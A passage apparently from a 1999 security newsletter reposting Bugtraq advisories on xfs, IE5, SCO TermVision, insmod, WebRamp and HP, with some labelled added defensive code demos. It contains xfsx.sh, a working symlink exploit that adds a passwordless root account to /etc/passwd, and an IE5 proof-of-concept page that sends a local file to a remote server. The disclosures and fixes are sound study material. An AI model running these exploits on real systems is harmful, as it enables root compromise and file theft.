        and even upload files (but not remove or overwrite existing ones).
        Since reading all files gives access to the SNMP community strings, which
        are stored in clear text in one of the files, this could be trouble, and
        writing files, well, just use your imagination.
        
        This was tested on software version 3.1.8 (the latest I can access).
        
        Thanks to cock@p.ulh.as, who helped test the vulnerability.
        
        Have a nice day.
        
        Disclaimers:
        - This "feature" report was only sent here, personal opinion; software that's
        worth thousands of dollars should be better beta tested;
        - I do know switches aren't generally accessible from the internet.
       

       @HWA

 12.0  xfs exploitability warning
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
       Bug in xfs

       Lukasz Trabinski (lukasz@LT.WSISIZ.EDU.PL)
       Tue, 30 Mar 1999 00:14:34 +0200 
       
       Hello,
       
        I hope this information will be useful for making a new patch for
        XFree86.
        
        I found a bug in xfs
        
        (Package XFree86-xfs-3.3.3.1-1 in RedHat 5.1 and probably in the RedHat 5.2
        updates, too)
        Xfs is the font server for XFree86; it also creates a directory in /tmp
        named .font-unix
       
       Let's make a little check:
       
       On first console (I logged as a normal user)
       
       [lukasz@lt /tmp]$ cat /etc/shadow
       cat: /etc/shadow: Permission denied
       
       [lukasz@lt /tmp]$ ls -all /etc/shadow
       -r--------   1 root     root          544 Mar 30 00:04 /etc/shadow
       
       [lukasz@lt /tmp]$ ll
       total 2
       drwxrwxrwt   2 root     root         1024 Mar 30 00:05 .
       drwxr-xr-x  18 root     root         1024 Mar 23 00:10 ..
       lrwxrwxrwx   1 lukasz   users          11 Mar 30 00:05 .font-unix ->
       /etc/shadow
       
       On second console, as root
       
       [root@lt /root]# xfs &
       [1] 2021
       [root@lt /root]# _FontTransSocketCreateListener: failed to bind listener
       _FontTransSocketUNIXCreateListener: ...SocketCreateListener() failed
       _FontTransMakeAllCOTSServerListeners: failed to create listener for local
       
       
       On first console:
       
       [lukasz@lt /tmp]$ ls -all /etc/shadow
       -rwxrwxrwt   1 root     root          544 Mar 30 00:04 /etc/shadow
       ^^^^^^^^^^^
       That's all ;)
       
        Solution: as root, before running xfs, do rm -rf /tmp/.font-unix
       
       
       Sorry for my broken English ;(
       
       
                           _[   Lukasz Trabinski   ]_
       PgP Key: finger:lukasz@oceanic.wsisiz.edu.pl, SysAdmin @wsisiz.edu.pl
       
       -----------------------------------------------------------------------
       
       Re: Bug in xfs
       
       Matthieu Herrb (matthieu@laas.fr)
       Wed, 31 Mar 1999 08:04:17 +0200 
       
       You wrote (in your message from Tuesday 30)
        >
        > I hope that's information will be useful for making new patch for
        > XFree86.
        >
        > I found bug in xfs
       
       
       This is caused by the same bug in xc/lib/xtrans that "in.telnetd"
       <telnetd@DOEMILL.SHOCKING.COM> reported under the subject "X11R6 NetBSD
       Security Problem" last week.
       
       The patch I submitted (with stat() replaced by lstat(), as noted by
       Kevin Vajk and other) also fixes that.
       --
                                               Matthieu
       
       -----------------------------------------------------------------------
       
       Re: Bug in xfs
       
       Juha Virtanen (jiivee@iki.fi)
       Wed, 31 Mar 1999 09:38:28 +0300 
       
       Regardless of the bug Lukasz Trabinski found in xfs -- it should
       be fixed and similar bugs traced from other software as well --
       it is not necessary to run xfs with root permissions at all.
       
        Someone may unknowingly argue that it needs to listen on a port.
        Yes, but that's usually port 7100, and as it's not under the 1024
        limit, root permission isn't needed.
        
        I've run xfs for ages on a separate account. Below is the
        significant startup line I use on RedHat 5.x systems:
       
       daemon /bin/su fontsvr -c "/usr/X11/bin/xfs -config /etc/X11/fs/config -port 7100 &"
       
       The rule is: if a daemon can do its work with lower permissions
       than root, it should.
       
        I also run named with non-root permissions (startup:
        /usr/sbin/named -u user -g group). I recommend other people
        do this as well.
       
       
       Juha Virtanen
       --
       <URL:http://www.iki.fi/jiivee/>
       
       -----------------------------------------------------------------------
       
       Re: Bug in xfs
       
       Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
       Wed, 31 Mar 1999 10:25:07 +0100 
       
       > I do also run named as nonroot permissions (Startup
       > /usr/sbin/named -u user -g group). I recommend other people
       > doing this as well.
       
        This isn't one to do blindly as it means named cannot bind to interfaces
        that appear dynamically (eg as a DNS cache on a terminal server). The
        upshot is that you end up having to run named as root or with the relevant
        capability to allow it to bind to low ports.
       
       Alan
       
       -----------------------------------------------------------------------
       
       Re: Bug in xfs
       
       Roman Drahtmueller (draht2@RZLIN1.RUF.UNI-FREIBURG.DE)
       Wed, 31 Mar 1999 05:10:14 +0200 
       
       [snip]
       > [lukasz@lt /tmp]$ ls -all /etc/shadow
       > -r--------   1 root     root          544 Mar 30 00:04 /etc/shadow
       [snip]
       > [root@lt /root]# xfs &
       [snip]
       > [lukasz@lt /tmp]$ ls -all /etc/shadow
       > -rwxrwxrwt   1 root     root          544 Mar 30 00:04 /etc/shadow
       [snip]
       > Solution, As root before run xfs, make rm -rf /tmp/.font-unix
       
       For sure this needs to be fixed. Your "solution" introduces a race
       condition, though, if the font server is started when users are
       allowed to log on.
       
       A better interim aid is not to run xfs as root in the first place. In
       fact, why would one want to run things as root if not necessary?
       
       Roman.
       Computer Center University of Freiburg, Germany.
       "The whole world is about three drinks behind."  (Humphrey Bogart)
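        The bug class behind Trabinski's demonstration, as an added example (my code,
        not xc/lib/xtrans or anything from XFree86): the unsafe pattern finds an existing
        /tmp/.font-unix, inspects it with stat() and "repairs" its mode with chmod(), and
        both calls follow symlinks, so a link planted by a user redirects the chmod to
        whatever the link points at. The hardened pattern uses the lstat() Herrb mentions
        and refuses anything it did not create itself unless it is a real directory, owned
        by the expected uid, already in the right mode. run_demo() rebuilds the scenario
        unprivileged in a scratch directory under /tmp: a file named shadow stands in for
        /etc/shadow and .font-unix is the planted symlink. Those names, and the checks
        beyond the stat()-to-lstat() change, are my additions, not something the thread
        describes.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

#define SOCKDIR_MODE 01777   /* world-writable + sticky: what xfs wants for /tmp/.font-unix */

/* Vulnerable pattern, reconstructed from the behaviour in the thread (not the real xtrans
 * code): if the directory already exists, stat() it and fix its mode with chmod(). Both
 * calls follow symlinks, so a link planted beforehand redirects the chmod to its target. */
int make_sockdir_unsafe(const char *dir)
{
    struct stat st;
    if (mkdir(dir, SOCKDIR_MODE) == -1 && errno != EEXIST) return -1;
    if (stat(dir, &st) == -1) return -1;
    if ((st.st_mode & 07777) != SOCKDIR_MODE && chmod(dir, SOCKDIR_MODE) == -1) return -1;
    return 0;
}

/* Hardened version: the stat()->lstat() change, plus what a privileged daemon should
 * verify before trusting anything in a world-writable directory. If we created the
 * directory ourselves we are done; if something was already there, accept it only when
 * it is a real directory, owned by the expected uid, already in the right mode. Never
 * chmod by path: that is the step an attacker redirects. */
int make_sockdir_safe(const char *dir, uid_t expected_owner)
{
    struct stat st;
    mode_t old_umask = umask(0);              /* so mkdir really yields 01777 */
    int rc = mkdir(dir, SOCKDIR_MODE);
    umask(old_umask);
    if (rc == 0) return 0;
    if (errno != EEXIST) return -1;
    if (lstat(dir, &st) == -1) return -1;     /* look at the name itself, not its target */
    if (S_ISLNK(st.st_mode))                  { errno = ELOOP;   return -1; }
    if (!S_ISDIR(st.st_mode))                 { errno = ENOTDIR; return -1; }
    if (st.st_uid != expected_owner)          { errno = EPERM;   return -1; }
    if ((st.st_mode & 07777) != SOCKDIR_MODE) { errno = EACCES;  return -1; }
    return 0;
}

/* Re-creates Trabinski's setup inside a scratch directory: "shadow" stands in for
 * /etc/shadow and ".font-unix" is the user-planted symlink pointing at it. Returns a
 * bitmask so each observation can be checked on its own:
 *   1  unsafe version reported success through the symlink
 *   2  ...and the stand-in shadow file is now world-writable
 *   4  safe version refused the symlink with ELOOP
 *   8  safe version accepted a directory it created itself
 * or -1 if the scratch setup could not be built. */
int run_demo(void)
{
    char tmp[] = "/tmp/xfs-demo.XXXXXX";
    char secret[256], lnk[256], real[256];
    struct stat st;
    int result = 0, fd;

    if (mkdtemp(tmp) == NULL) return -1;
    snprintf(secret, sizeof secret, "%s/shadow", tmp);
    snprintf(lnk, sizeof lnk, "%s/.font-unix", tmp);
    snprintf(real, sizeof real, "%s/.font-unix-ok", tmp);

    if ((fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600)) == -1) return -1;
    close(fd);
    if (symlink(secret, lnk) == -1) return -1;

    if (make_sockdir_unsafe(lnk) == 0) result |= 1;
    if (stat(secret, &st) == 0 && (st.st_mode & S_IWOTH)) result |= 2;

    errno = 0;
    if (make_sockdir_safe(lnk, getuid()) == -1 && errno == ELOOP) result |= 4;
    if (make_sockdir_safe(real, getuid()) == 0) result |= 8;

    unlink(lnk); unlink(secret); rmdir(real); rmdir(tmp);
    return result;
}

int main(void)
{
    int r = run_demo();
    if (r < 0) { perror("demo setup"); return 1; }
    printf("unsafe: chmod went through the symlink : %s\n", (r & 1) ? "yes" : "no");
    printf("unsafe: target now world-writable       : %s\n", (r & 2) ? "yes" : "no");
    printf("safe:   refused the symlink (ELOOP)     : %s\n", (r & 4) ? "yes" : "no");
    printf("safe:   created its own directory       : %s\n", (r & 8) ? "yes" : "no");
    return (r == 15) ? 0 : 1;
}
```

        The safe version deliberately does not try to "fix" a pre-existing directory with
        the wrong mode or owner: a daemon that repairs whatever it finds in /tmp is what
        made the symlink attack work, and Roman's point about the rm -rf workaround being
        racy applies to any such repair step as well.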

       @HWA
                
 12.1  xfsx.sh - Very simple shell script exploit code for the recently discovered xfs 
       security hole. By ArchAng3| of Death, Midgard Security Team. 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        #!/bin/sh
        # X Font Server **exploit** 
        # ArchAng3| of Death -- Member Of Midgard Security Team
        # usage: xfsx &
        # the proggie stays in the background checking for write access to 
        # /etc/passwd; when it has write access it creates an account and 
        # mails back at you.
        
        # -e/-L rather than -f: a directory or a dangling symlink already named
        # .font-unix would also defeat the ln -s below.
        if [ -e /tmp/.font-unix ] || [ -L /tmp/.font-unix ]; then
           echo "File already exists..."
           echo "Aborting..."
           exit 1
        
        else
        
          echo "Creating symlink to /etc/passwd..."
          ln -s /etc/passwd /tmp/.font-unix
          echo "Symlink created..."
          echo "Now just wait until root executes xfs..."
          # xfs started as root chmods through the symlink, so /etc/passwd
          # eventually becomes world-writable; poll for that.
          while true; do
           sleep 60
           if [ -w /etc/passwd ]; then 
             echo "r00t::0:0:r00t:/:/bin/bash" >> /etc/passwd
             echo "0wn3d..." > .xfsxtmp666
             grep r00t /etc/passwd >> .xfsxtmp666
             echo "su r00t might be a good thing to do ..." >> .xfsxtmp666
             mail `whoami` < .xfsxtmp666
             rm -f .xfsxtmp666
             rm -f /tmp/.font-unix
             exit 0
           fi
          done  
        fi

       
       
       
       @HWA
       
 13.0  Bug allows remote systems to read local files remotely in MSIE5
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 30 Mar 1999 19:35:16 +0300
       From: Georgi Guninski <joro@NAT.BG>
       To: BUGTRAQ@netspace.org
       Subject: IE 5.0 allows reading and sending local files to a remote server
       
        There is a security bug in Internet Explorer 5.0, which allows reading and
        sending local files to a remote server.
        The problem is a bug in the DHTML edit control, which allows pasting a
        filename in a FILE object. When the form is submitted via JavaScript, the
        contents of the file are sent to a remote server.
       
       Demonstration is available at: http://www.nat.bg/~joro/fr.html
       
       Workaround: Disable JavaScript
       
        I would like to thank Juan Cuartango
        (http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE
        exploits, which helped me a lot in discovering this vulnerability!
       
       Regards,
       Georgi Guninski
       http://www.nat.bg/~joro
       
       -------------------------------------------------------------------------
       
       [http://www.nat.bg/~joro/fr.html]
       
        <HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>
        </HEAD>
        <BODY>
        There is a bug in Internet Explorer 5.0 which allows reading and sending local files.
        <BR>
        The file name must be known.
        <BR>
        Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!
        <BR>
        Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>
        <BR>
        Workaround: Disable JavaScript
        <BR>
        <BR>
        <INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">
        
        <SCRIPT>
        
        function f1()
        {
          // select the local path in the text box and copy it to the clipboard
          document.all.A1.select();
          document.execCommand("copy");
        
          // focus the first element of the form loaded into the DHTML edit control
          // (the FILE input), paste the path into it via the control's paste
          // command, then submit so the file contents travel to the server
          dh.DOM.forms(0).elements(0).focus();
          dh.execCommand(5032);
          setTimeout("dh.DOM.forms(0).submit();",1000);
        }
        
        function f()
        {
          alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");
          dh.loadURL("http://www.nat.bg/~joro/form3.html");
          setTimeout("f1()",2000);
        }
        
        setTimeout("f();",1000);
        
        </SCRIPT>
        
        <!-- the DHTML edit control; form3.html (loaded above) supplies the form with the FILE input -->
        <OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh 
        width=700>
        </OBJECT>
        
        </BODY>
        </HTML>
       
       -------------------------------------------------------------------------
       
       Date: Wed, 31 Mar 1999 09:14:47 +0100
       From: Andrew Tulloch <frohicky@TECHNOLOGIST.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: IE 5.0 allows reading and sending local files to a remote server
       
       
       If you look under scripting options in security settings there is the option
       "Allow paste via script" simply turning this to disabled provides this
       result:
       
       <paste>
       See the contents of your file among the other stuff
       ----------------------------------------------------------------------------
       ----
       -----------------------------7cf26c3b6a8 Content-Disposition: form-data;
       name = "a"; filename="" Content-Type:
       application/octet-stream -----------------------------7cf26c3b6a8--
       </paste>
       
       which as far as I see has disabled the reading of local files and is a
       little less drastic than disabling all JavaScript.
       
       Regards,
       
       Andrew Tulloch
       
       -------------------------------------------------------------------------
       
       Date: Wed, 31 Mar 1999 14:05:21 -0800
       From: "Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: IE 5.0 allows reading and sending local files to a remote server
       
       There is another workaround.  In IE5, if you use the "built in" feature to
       limit scripted paste operations then the problem doesn't seem to manifest.
       
        Try the following and go to the sample implementation:
       
       Tools menu --> Internet options --> security tab --> custom level --> allow
       paste operations via script = prompt or disable
       
       
       Stephen
       

       @HWA 
       
 14.0  Possible root/user level compromise in SCO TermVision
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Wed, 31 Mar 1999 16:50:13 +0100
       From: JJ Gray <nexus@PATROL.I-WAY.CO.UK>
       To: BUGTRAQ@netspace.org
       Subject: Potential vulnerability in SCO TermVision Windows 95 client
       
       
       Hi folks,
               I recently downloaded a trial version of the SCO TermVision 
       terminal emulation package for SCO Openserver 5 and Windows 95 (
       http://www.sco.com/vision/products/termvision/ ).   This comes
       in two parts, the server based binaries and the Windows 95 client,
       TermVision 2.1.   In addition to the terminal emulation you get 
       'UNIX Neighborhood' which once supplied with a hostname, username &
       password gives an explorer/X-Windows style interface to the SCO server.
       In the default configuration the hostnames, usernames & passwords are 
       saved in a file : C:\Windows\Profiles\%username%\Application
       Data\SCO\Vision\Auth\%username%.vca
       ( PC is Windows 95, NT4 server, user profiles ).  The data is encrypted
        but, not being a cryptanalyst, it took me a good 15 minutes to 
       discover the encryption is nothing more than a fixed string XOR :(
       I informed SCO of this on 30th March and received a reply the next day :)
       --
        From Matthew Schofield, Support <mattsc@sco.com>
       
       JJ,
       
       Thanks for highlighting this issue in the Vision Comms.
       
       By your own definition it is insecure, in that the contents of the .vca
       files can be obtained with some effort. In terms of actually using 
       someone's .vca file through the comms layer in order to access the UNIX 
       resources through a Vision product, the files can only read by the
       comms layer if the user has successfully logged into Windows as that user.
       --
       Extracted from my reply -
       
       This is of no consequence.   The point is that I can extract the UNIX
       username & password from another user that has used the same PC.
       If that user happens to use root access then I have the root password -
       thus a non privileged user with windows access can gain root privs on
       the UNIX box, whether through UNIX Neighborhood, terminal emulation,
        a terminal itself, telnet etc.   If I were a windows user with no user
       account on the UNIX box......... :)
       --
       When adding a host, the security options can be set to 'Prompt' where the
       password is not saved.   Yes this is only a potential security hole - 
       another on the 'Configuration' issue, but it is not obvious that this 
       vulnerability exists.   The default is insecure and there is no 'obvious' 
       information in the documentation that it is so - hence my post.
       Matthew finished by saying
       --
       As you have already identified, you should change the password mechanism
       for your host to prompt. In a future release we intend to either change 
       the operation of the password mechanism or add an appropriate warning.
       --
       Can't really say fairer than that I suppose...
       
       Regards,
               JJ Gray
       
       
       Sed quis custodiet ipsos custodes ?
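        Added example (not from JJ Gray's post or from SCO) showing why a fixed-string XOR gives no protection to anyone who can read the file, and hence why the 'Prompt' setting is the right fix: one record whose plaintext you know (your own credentials) reveals the key, and the key opens every other record saved under it. The key, the record layout and the credentials below are all constructed for the demo; the real .vca format and key are not disclosed by the post.

```python
from itertools import cycle

# Constructed demo key: a stand-in for the fixed string the post found,
# NOT the real TermVision key (which the post does not disclose).
DEMO_KEY = b"fixed-key-demo!"


def xor_fixed(data: bytes, key: bytes) -> bytes:
    """The scheme the post describes: every byte XORed with a fixed,
    repeating key string. XOR is its own inverse, so the same call
    both 'encrypts' and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def keystream_period(stream: bytes) -> int:
    """Smallest p such that stream[i] == stream[i-p] for every i >= p.
    For a fixed repeating key this is the key length, provided the
    known sample is at least a couple of key lengths long."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return len(stream)


def recover_key(known_plain: bytes, known_cipher: bytes) -> bytes:
    """plaintext XOR ciphertext gives the key stream back; one period
    of that stream is the fixed key."""
    stream = xor_fixed(known_plain, known_cipher)
    return stream[: keystream_period(stream)]


def demo() -> dict:
    """Constructed scenario: two saved-credential records on a shared PC,
    both 'protected' with the same fixed key. Knowing the contents of
    one record (your own) is enough to read the other."""
    own_plain = b"host=unixbox;user=alice;pass=alice-own-secret-1"
    other_plain = b"host=unixbox;user=root;pass=constructed-demo"
    own_cipher = xor_fixed(own_plain, DEMO_KEY)
    other_cipher = xor_fixed(other_plain, DEMO_KEY)
    key = recover_key(own_plain, own_cipher)
    return {
        "key_length": len(key),
        "key_recovered": key == DEMO_KEY,
        "other_record": xor_fixed(other_cipher, key),
    }
```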

       @HWA
       
 15.0  Linux INSMOD exploit/vulnerability
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Tue, 30 Mar 1999 22:08:13 -0500
       From: Brian Szymanski <bks10@CORNELL.EDU>
       To: BUGTRAQ@netspace.org
       Subject: linux insmod bug/security vulnerability
       
       Howdy all,
       
       Recently I discovered a bug in insmod that would require a lot of time
       and luck to exploit, but is nonetheless important for systems wanting
       rock-solid security (security shouldn't be a matter of luck). In short,
       when insmod is called without a full path to the module to load, it
       checks a small path to find the module in question. By default, this
        path is the current directory followed by the /lib/modules/ hierarchy.
       In the widely distributed versions of the software, the module is not
       checked for root ownership, and there is no way to tell which file has
       been loaded after insmod is called. Needless to say, putting a malicious
        user's code into the kernel and then running it in kernel mode is a
       very Bad Thing.
       
       LINUX DEVELOPERS, HOWTO-WRITERS, ETC... TAKE HEED!!!
       The listed maintainer of the program, Jacques Gelinas
       (jack@solucorp.qc.ca), informs me that modprobe (not insmod) should be
        used to load pathless modules from the /lib/modules hierarchy, but in
       practice most people (and precanned scripts) use insmod, compounding the
       problem. It appears that the well distributed versions of modprobe are
       NOT vulnerable to these bugs (tested on debian 2.1). ***Please change
       any documentation you write or scripts you distribute to use modprobe
       instead of insmod ASAP*** This should probably be forwarded to some sort
       of linux development list, but I know of none at the moment.
       
       VERSIONS AFFECTED, IMPROVED (if not fixed) VERSION:
       The versions included in debian, redhat, and most if not all other
       distributions are vulnerable as well. Any version previous to 2.2.2-pre6
       (available from
       http://www.pi.se/blox/modutils/modutils-2.2.2-pre6.tar.gz). Please
       upgrade to this version, which one of the package maintainers, Bjorn
       Ekwall (bj0rn@blox.se), informs me fixes the following issues:
       
       o A module has to be owned by root.
       
       o All "path-less" modules are resolved according to the list of
         paths in conf.modules (explicitly or via the built-in defaults).
         Note that all module utilities use the same configuration
         and thus the same paths in the new release.
       
       o If insmod is called without a path to the module, insmod will
         print the full path of the module it actually selects to install.
       
       PROBLEMS IN THE NEW VERSION:
       The new version is a big improvement, but not perfect (after all, it's a
       pre-stable version...) The last 2 points appear to be implemented fine,
       but the first is imperfect. The root ownership checks only appear to
       happen when the path to the module is not specified. I don't see any
       reason why you would ever need to load a module owned by a user, when
       you can just su and copy /chown it. Also, there is some oddness when a
       module in /lib/modules isn't owned by root. insmod spits out 24(!) lines
       like this:
           insmod: /lib/modules/2.2.4/misc/vmmon is not owned by root
       That's better, but I still don't like the idea of bugs in this area of
       the code...
       
       Another thing to be wary of: There may be some unresolved issues with
       groups and permissions, but it'd probably just be bloat for this package
        to worry about warning of those issues (i.e., mode a+w modules or g+w
       with group != root). Then again, linux's swapon checks for the proper
       permissions on a swapfile/device, so perhaps it wouldn't be unreasonable
       to warn about permissions.
       
       I don't see what's so hard about just checking for ownership and
       permissions issues *after* resolving the full path of the module, but
       then again, I've been too lazy to RTFS so far, so sue me if it isn't
       that trivial.
       
       EXPLOIT:
       As previously mentioned, an exploit would require a lot of luck and
       time, but would basically consist of regularly throwing a lot of
       trojan'd .o files in /tmp, and waiting until root decides to clean out
       tmp right before loading some module... Far-fetched but too possible for
       comfort. Other scenarios along these lines could be imagined. Equally
        far-fetched, but the point is the currently distributed versions don't
       do it the Right Way... It's a lot more likely that you would make your
       system crash and burn due to this bug (although files do seem to be
       checked to be in elf format before being loaded).
       
       Thanks for reading. Comments and constructive criticisms more than
       welcome:
       
       Brian Szymanski
       bks10@cornell.edu
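        Added example (not from the post and not modutils' own code) of the check Brian asks for: resolve the path-less module name the way the post describes (current directory first, then the /lib/modules tree), and only then audit the chosen file for root ownership, group/world write bits and the ELF magic. The search order, the uid-0 policy and the temp-tree scenario with a user-dropped vmmon.o shadowing the real one are assumptions built for the demo.

```python
import os
import shutil
import stat
import tempfile
from typing import List, Optional, Sequence

ELF_MAGIC = b"\x7fELF"


def resolve_module(name: str, search_dirs: Sequence[str]) -> Optional[str]:
    """The path-less lookup the post describes: the first directory in
    search_dirs (current directory, then the /lib/modules tree) holding a
    file called `name` wins. A name containing a slash is an explicit path."""
    if os.sep in name:
        return name if os.path.isfile(name) else None
    for directory in search_dirs:
        for root, _subdirs, files in os.walk(directory):
            if name in files:
                return os.path.join(root, name)
    return None


def audit_stat(st: os.stat_result, trusted_uid: int = 0, trusted_gid: int = 0) -> List[str]:
    """Ownership/permission policy the post argues for, applied to the stat
    of the *resolved* path. Returns the list of violations (empty = OK)."""
    problems: List[str] = []
    if stat.S_ISLNK(st.st_mode):
        problems.append("symlink")
    elif not stat.S_ISREG(st.st_mode):
        problems.append("not a regular file")
    if st.st_uid != trusted_uid:
        problems.append("not owned by uid %d" % trusted_uid)
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        problems.append("group-writable by gid %d" % st.st_gid)
    return problems


def fake_stat(perm: int, uid: int, gid: int, regular: bool = True) -> os.stat_result:
    """Hand-built stat result so the policy can be exercised without chown
    (which needs root). Field order: mode, ino, dev, nlink, uid, gid, size,
    atime, mtime, ctime."""
    mode = (stat.S_IFREG if regular else stat.S_IFLNK) | perm
    return os.stat_result((mode, 0, 0, 1, uid, gid, 64, 0, 0, 0))


def check_module(path: str, trusted_uid: int = 0, trusted_gid: int = 0) -> List[str]:
    """lstat (so a symlink is seen as such) + the policy above + the ELF
    magic check the post notes insmod already performs."""
    st = os.lstat(path)
    problems = audit_stat(st, trusted_uid, trusted_gid)
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as fh:
            if fh.read(4) != ELF_MAGIC:
                problems.append("not an ELF object")
    return problems


def demo() -> dict:
    """Constructed scenario from the post: a 'vmmon.o' dropped in a directory
    searched first (the post's /tmp) shadows the real module under the
    lib/modules tree. Everything lives in a temp tree owned by the current
    user, so trusted uid/gid are set to the current ids and the demo
    isolates the write-permission part of the policy."""
    base = tempfile.mkdtemp()
    try:
        scratch = os.path.join(base, "tmp")
        release = os.path.join(base, "lib", "modules", "2.2.4")
        os.makedirs(scratch)
        os.makedirs(os.path.join(release, "misc"))
        rogue = os.path.join(scratch, "vmmon.o")
        real = os.path.join(release, "misc", "vmmon.o")
        for path, mode in ((rogue, 0o666), (real, 0o644)):
            with open(path, "wb") as fh:
                fh.write(ELF_MAGIC + b"\0" * 60)  # just enough to pass the magic check
            os.chmod(path, mode)
        chosen = resolve_module("vmmon.o", [scratch, release])
        me, my_group = os.getuid(), os.getgid()
        return {
            "chosen": os.path.relpath(chosen, base),
            "chosen_problems": check_module(chosen, me, my_group),
            "real_problems": check_module(real, me, my_group),
        }
    finally:
        shutil.rmtree(base)
```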
       
       @HWA
       
 16.0  Webramp DoS
       ~~~~~~~~~~~
       
       Date: Wed, 31 Mar 1999 15:28:22 -0500 (EST)
       From: X-Force <xforce@iss.net>
       To: alert@iss.net
       Cc: X-Force <xforce@iss.net>
       Subject: ISSalert: ISS Security Advisory -- WebRamp Denial of Service Attacks
       
       TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to
       majordomo@iss.net  Contact alert-owner@iss.net for help with any problems!
       ---------------------------------------------------------------------------
       
       
       -----BEGIN PGP SIGNED MESSAGE-----
       
       ISS Security Advisory -- WebRamp Denial of Service Attacks
       March 31, 1999
       
       Synopsis:
       
       Ramp Networks (http://www.rampnet.com/) WebRamp Internet access devices
       allow multiple computers to share a dialup connection. The WebRamp family
       of Internet access devices are designed for small businesses that require
       cost-effective, high-speed Internet access on every desktop.
       
       WebRamp is vulnerable to two denial of service attacks that allow an
       attacker to either crash the WebRamp device or change its IP address.
       When the device crashes, it will have to be manually reset before
       it will dial up. If an attacker changes the IP address of the WebRamp,
       none of the machines on your network will be able to find it, so no
       machines will be able to access the Internet via the WebRamp. The device
       will still function as a network hub, so your intra-LAN connectivity will
       not be disrupted.
       
       
       Description:
       
       WebRamp crash/denial of service attack: Sending a specially formatted string
       of characters to the HTTP port of the WebRamp causes the device to hang,
       requiring a manual reset.
       
       WebRamp IP address change: Sending a specially-formatted UDP packet to port
       5353 changes the WebRamp's local IP address, effectively 'hiding' the
       device from the rest of your machines. The WebRamp is still connected to
       the Internet and its PPP IP address is unchanged.
       
       Recommendations:
       
       If an attacker has crashed your WebRamp, then manually reset it by turning
       it off and on again.
       
       If an attacker has changed the IP address, use WRFINDER.EXE on the WebRamp
       installation CD to change the address to a proper value.
       
       
       Fix Information:
       
       Go to http://www.rampnet.com/upgrades to get the latest firmware for your
       model of WebRamp.
       
       
       Additional Information:
       
       Information in this advisory was obtained by the research of Jon Larimer
       <jlarimer@iss.net> of the ISS X-Force. ISS X-Force would like to thank
       Ramp Networks <http://www.rampnet.com> for their assistance with testing
       on WebRamp devices and providing fix information.
       
       ________
       
       Copyright (c) 1999 by Internet Security Systems, Inc.
       
       Permission is hereby granted for the electronic redistribution of this
       Security Advisory.  It is not to be edited in any way without express
       consent of the X-Force.  If you wish to reprint the whole or any part of
       this Security Advisory in any other medium excluding electronic medium,
       please e-mail xforce@iss.net for permission.
       
       Internet Security Systems, Inc. (ISS) is the leading provider of adaptive
       network security monitoring, detection, and response software that
       protects the security and integrity of enterprise information systems.  By
       dynamically detecting and responding to security vulnerabilities and
       threats inherent in open systems, ISS's SAFEsuite family of products
       provide protection across the enterprise, including the Internet,
       extranets, and internal networks, from attacks, misuse, and security
       policy violations.  ISS has delivered its adaptive network security
       solutions to organizations worldwide, including firms in the Global 2000,
       nine of the ten largest U.S. commercial banks, and over 35 governmental
       agencies.  For more information, call ISS at 678-443-6000 or 800-776-2362
       or visit the ISS Web site at http://www.iss.net.
       
       Disclaimer
       The information within this paper may change without notice. Use of this
       information constitutes acceptance for use in an AS IS condition. There
       are NO warranties with regard to this information. In no event shall the
       author be liable for any damages whatsoever arising out of or in
       connection with the use or spread of this information. Any use of this
       information is at the user's own risk.
       
       X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as
       well as on MIT's PGP key server and PGP.com's key server.
       
       X-Force Vulnerability and Threat Database: http://www.iss.net/xforce
       
       Please send suggestions, updates, and comments to:
       X-Force <xforce@iss.net> of Internet Security Systems, Inc.
       
       
      
       @HWA
       
 17.0  HP Security bulletins, (March 31)       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Wed, 31 Mar 1999 04:35:03 -0800 (PST)
       Subject: Security Bulletins Digest
        From: support_feedback@us-support.external.hp.com (HP Electronic Support Center )
       To: security_info@us-support.external.hp.com
       Reply-To: support_feedback@us-support.external.hp.com
       Errors-To: support_errors@us-support.external.hp.com
       
       
                               HP Support Information Digests
       
       ===============================================================================
       o  HP Electronic Support Center World Wide Web Service
          ---------------------------------------------------
       
          If you subscribed through the HP Electronic Support Center and would
          like to be REMOVED from this mailing list, access the
          HP Electronic Support Center on the World Wide Web at:
       
            http://us-support.external.hp.com
       
          Login using your HP Electronic Support Center User ID and Password.
          Then select Support Information Digests.  You may then unsubscribe from the
          appropriate digest.
       ===============================================================================
       
       Digest Name:  Daily Security Bulletins Digest
           Created:  Wed Mar 31  3:00:02 PST 1999
       
       Table of Contents:
       
       Document ID      Title
       ---------------  -----------
       HPSBUX9903-096   Security Vulnerability in MC/ServiceGuard & MC/LockManager
       HPSBUX9903-095   Security Vulnerability with DESMS
       
